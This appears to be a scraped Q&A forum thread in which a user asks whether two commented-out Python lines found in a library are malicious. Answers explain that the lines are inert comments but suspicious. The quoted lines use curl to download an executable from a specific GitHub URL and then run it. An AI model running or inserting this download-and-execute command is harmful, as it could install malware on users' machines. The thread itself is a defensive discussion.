Home > OS >  Is this code that downloads and runs an exe from github malicious?
Is this code that downloads and runs an exe from github malicious?

Time:12-27

Please do not run any of this code if you don't know what that is!

I found this in a library

# os.system(r"curl --silent https://raw.githubusercontent.com/Swe4rX/test/main/WinStartupApplicationDLL.exe --output tmp.exe")
# os.system("start tmp.exe")

Is there anything bad going on? I really want to know because ive ran it in the past. My friend told me it doesn't do anything because theres that # symbol in front of the strings but I want to ask more experienced people.

CodePudding user response:

If this code weren't commented out, it'd use curl to download an exe file from GitHub and execute it locally. I haven't analyzed this executable or ran it on my machine, but unless you know exactly what it is, the best practice would be to assume it's malicious. These lines are indeed commented out so they wouldn't execute, but on the other hand, if you didn't put them and you don't need them - just remove them.

CodePudding user response:

Your friend is correct; the # at the start of the line marks it as a comment, so Python doesn't execute the line. It's very suspicious-looking code, though. You definitely wouldn't want to uncomment it and run it.

CodePudding user response:

Code is commented out so it would not execute.

I am a bit uncertain of the motive behind this question.

@Keyzz is a new user and is further referring to his/her friend (may be imaginary).

Is this a trick to make users of this platform infect themselves with malware, trojan or a virus ?

  • Related